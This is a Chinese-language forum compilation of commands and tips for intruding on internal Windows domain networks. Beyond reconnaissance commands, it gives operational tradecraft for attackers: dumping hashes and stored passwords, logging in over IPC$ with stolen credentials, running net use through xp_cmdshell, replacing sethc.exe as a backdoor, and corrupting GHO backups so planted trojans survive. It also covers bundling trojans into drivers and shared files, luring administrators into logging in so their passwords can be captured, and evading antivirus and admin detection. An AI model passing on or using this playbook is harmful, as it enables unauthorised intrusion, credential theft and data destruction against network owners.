内网渗透一些命令收集整理

内网渗透一些命令收集整理

=====

一些收集信息的命令

=====

@查询本机的一些情况

ipconfig /all

@查询存在关系的机器

Net view

@查询有几个域

nei view /damin

@查看 testdomain域中的计算机列表

net view /domain:testdomain

@查询域内的组

net group /domain

@划分网段

dsquery subnet

@查询域内用户

net user /domain

@查询域内组信息

net group /domain

@查询域管理用户组

net group "domain admins" /domain 

@查看管理员登陆时间，密码过期时间，是否有登陆脚本，组分配等信息！

net user domain-admin /domain

@查询域内计算机

net group "domain computers" /domain

@判断机器属于哪个域

net config Workstation

@判断主域.主域服务器都做时间服务器

net time /domian  //这招是在LCX牛的文章里面学会的

net group "domain admins" /domain

@ipc域内连接

net use \\IP\ipc$ password /user:username@domain

====

猜测内网结构的一些命令和工具

====

tracert  10.1.0.1

ping x.x.x.x

nbtscan -r 192.168.16.0/24

@扫描某个段的一些东西 //感谢玫瑰大叔的工具。感谢猫师傅给我说这个东东

hd.exe -hscan 10.0.0.1-10.0.0.255 /a /t 200

还有一个内网结构图形化表现工具

dude  ///感谢影叔 感谢LInux520群得朋友说

还有一部分没有整理。过段时间在发上来吧~ 欢迎各位牛一起交流内网渗透。

---------------------------------------------------------------------------------

t00ls里关于内网渗透的讨论整理

溢出 嗅探 信息收集 网络结构探测 翻敏感文件
==========================================
找密码(flashfxp,cuteftp,filezilla,pcanywhere以及其他一些应用或许在.ini,.cfg之类的里面有数据库或者其他的密码)
查cookie(很好用哦,有些cookie甚至是明文存密码的,尤其是国外,也能清楚管理员上哪些网站)
net view,SNIFF之类的小米说过了.字典也是很不错的.
还有查看my documents的default.rdp,抓HASH,破密码,看最近登录的网站,收藏夹,最近运行记录.这些不管是在图形界面还是CMD下都能做到的.
其他的暂时想不到了...xiong121
综合利用吧.
==========================================

内网渗透: 1拿到本机的权限,先 quser 然后 netstat -an 看数据库连哪里了，本机开了什么服务，接着提权GETHASH 如果破不出来就种个GINA ，然后 dir x:\web\*.as* /s 会列个表出为的，然后数据库密码，看站的大小了，大站的话经常容易翻到SA 的，如果破出来了HASH 就 要看一下本机的终端或数据库，管理也许会改端口的 传个 s.exe   扫一下内网哪些机子开了 135,139,445,80,21,1433,3389,改过的端口 扫一通后就 net use \\xx.xx.xx.xx\admin$ 试密码吧,个人经验，一般如果内网或公司大的话，每台机子上肯定都有同一个官理员账号来管理所有的机子，也许是备用，也许是什么，但是我遇到的很多都有，这个要搞到三台机子以上才能确定，搞到后内网通杀，如果破出来就搞定了。如果要翻文件，你要怎么翻？ htran 反弹出来？以前我也这样做，后来发现，其实不用 net use x: \\xxx.xx.xx.x\x$ 映射一下就行了，然后用 cmd shell dir x:\ 就出来了，不用上终端，多隐蔽，只不过用完记得 net use \\xxx.xxx.xxx.xx\x$   /delete 还有就是，上终端的好处是肯定很多，不过我还是推荐能用CMDSHELL 搞定就最好用CMDSHELL 搞定，达到目标后就不要动了，这样如果不是什么特别出格的事的话，管理员是不会发现的，越少的动作，越大的安全。
还有你说的内网一台机子中了远控弹回来了，按道理说可以弹个终端回来的，当然，如果你想在CMDSHELL 下操作也不是不行的，你现在有一个内网机了，重要的是再搞一台入口机，就是常用的WEB 好，拿着你以前的资料去搞WEB吧，破本机的HASH去IPC内网别的机子吧，得到别的机子权限了，可以弹别的机子回来，不一定要弹本机的！资料收集保存是相当重要的，这两天就因为以前收集的资料让我又重获了一个非常火爆的GAME权限是什么不能说，嘿嘿~！

常用到的 : net use \\xx.xx.xx.xx\xx$ pass /u:user   丢一个SQL 的XP_CMDSHELL 执行net use 的命令 exec master..xp_cmdshell [net use \\192.168.1.102\ipc$ mimashizheli/u:192.168.1.102\administrator] 有人说SYSTEM 下不能执行 net use 这样就可以执行了
还有就是小路写的那个 用ASP代码 wmi 执行命令的东西很管用的，一般就是通过 net use 加wmi 组合 net use x:\\xxx.xx.xx.xx\x$ 把对方的硬盘映射一下，然后 copy xx.exe x:\x.exe 然后通过wmi 直接执行 如果wmi 提示 rpc 什么错误就 del x:\sethc.exe /s 然后 copy 个cmd 过去，连终端，用SHIFT 后门，嘿嘿，还有一招，你要想把你电脑上的东西传到内网上怎么办呢？很多方法，我这里说一种不常用的，也算是成功率最高的，就是在终端连接器那里选项，本地资源，硬盘，前题是你们之间的速度够快，而且你要打开的那个文件夹里东西别太多。直接拖东西到内网的机子上，哈哈。我网速不行，很少用这个，除非是逼不得已。你连了一次后下次连接会有提示，你可以这样，你断掉后，把那个勾也给取消掉，再连一次，进去，再注消，下次就不会提示了
别的，就是多收集密码，很有用。别的一时半会想不起来，反正就那些东西，我说的这些就是常用的，高深的我也不会，内网渗透，我还是菜鸟级别，虫子牛很强的。这东西，搞多了自已就会有经验的。多搞搞吧，实贱出真知，哈哈，多贱贱
==========================================
我就讲讲一点点经验了..大牛见笑了.
一个大的内网一般都是分几个管理员管理..然后你会发现同一个管理员管理的机子配置密码大都相同,
但是一般不要在管理员常用的机子上下马,除非你有非常好的马..下马都在那些管理员不常登陆的机子上去,
主要收集的密码就是NT密码和MSSQL密码.这两个东东可以直接拿权限,速度快.
另外遇到GHO备份文用copy /b xxx.gho+1.txt xxx.gho 将其破坏.然后再在管理员必须用的软件上绑上你的小马..比如驱动程序之类必须的..这样可以让你肉鸡保得长久...我其实一直在想一个问题,但是没有做过.就是从内网弹个3389回来,然后在机子上装个虚拟机再做一个GHO把你的马先存好,或者放其它后门,..这样就更爽了..
==========================================
顶一下，谢谢各位黑客热心的回答，楼上两位的文章都看过了，很不错。这里我说一下这几天学习的一些体会。linux不太熟，只懂一些基本的操作，配置服务什么的，至于入侵linux主机确实没怎么接触过，这里就说win环境吧。
一般比较大的内网都是域环境的，这时候就应该以域控和域管理员账号为最高优先级的目标。如果把域控拿下或者抓到域管理员密码的话，这个域基本就沦陷了。可以先在拿下的机器上面看下c:\documents and settings目录，如果发现有域管理员的目录，说明他登陆过这台机器，就中个记密码的后门上去，因为域管理员是有可能登陆任何一台机器的，特别是重要的服务器。至于日域控的方法，exp，sniff，跑弱口令什么的都可以试一下。工具的免杀也是相当重要的，传上去之前最好本地先用他的杀软测试一下，传上去之后被杀了事小，杀软报警引起人家警觉就不好了-_-
最后再说一个比较猥琐的方法。假设拿到域中的一台普通pc，想抓域管理员密码，可以先中个记密码的后门，然后用这台机器搞点小动作，让网管过来检查，他一登陆，你就可以用他的账号密码为所欲为了。当然，动作一定要控制好，搞得太大让人家重装系统就不好了-_-
==========================================
别的都可以使用 有一点记住了 比较大的,管理牛比的,比较重要的内网别嗅探,经常就是一嗅就丢
大概弄清楚整个网络结构,比如通过经验猜测域服务器地址之类
翻文件收集口令,包括各种第3方软件,pcanywhere vnc sql 之类的
抓本机hash,或者gina拿密码.有了一个明文还不够,看看sql机器在那里,本机的话上去下sa的hash回来跑
mysql的hash一样要跑 这样就大概有2个以上的明文了
然后根据明文密码找规律 没有规律的话可以考虑溢出了,当然如果是内网专业的渗透人员,平时花rmb或者通过朋友关系购买或者其他途径弄0day是不可少的,没有这些的付出溢出的几率就很低了,如果实在没有其他方法继续渗透, 不妨做好清理工作,留下的shell不能被管理员发现,等到新的0day出现时再动手不迟.没事别上shell.
明文没规律,溢出不成功.这样的话其实就不是一时半会能渗透到整个网络了
一般一个大的内网,总是会提供几台机器作为资源服务器的,很多不需要密码就可以连入某些机器的共享,当然最好使用管理员的帐户去登陆win系统,然后再使用共享,这样有时候可以看到管理员浏览器里的一些历史记录,可以更快速的找到共享服务器,上去以后看看权限如何,有小部分资源服务器会提供一个或者几个目录供用户上传一些东西.这时可以把木马伪装下丢进去, 捆绑或者直接excel0day pdf0day..当然免杀不过关,或者文件名的吸引人的程度不过关就意义不大了.

如果怎么都找不到有用的信息,无法有实质性进展的话,已经到了非要嗅的程度的话,记得别用cain,用一些针对性强的嗅探工具针对端口和机器进去嗅探,比如去嗅资源服务器的用户名,结合我上面说的或许会有收获,或者嗅下sql帐户什么的
但是这时其实是最危险的,使用计划任务定时嗅探,不要急于一时嗅全天,配合vbs,管理员登陆就停止嗅探

如果这些都不好使,想办法社工吧.虽然内网渗透的时候我社工从来没成功过....
==========================================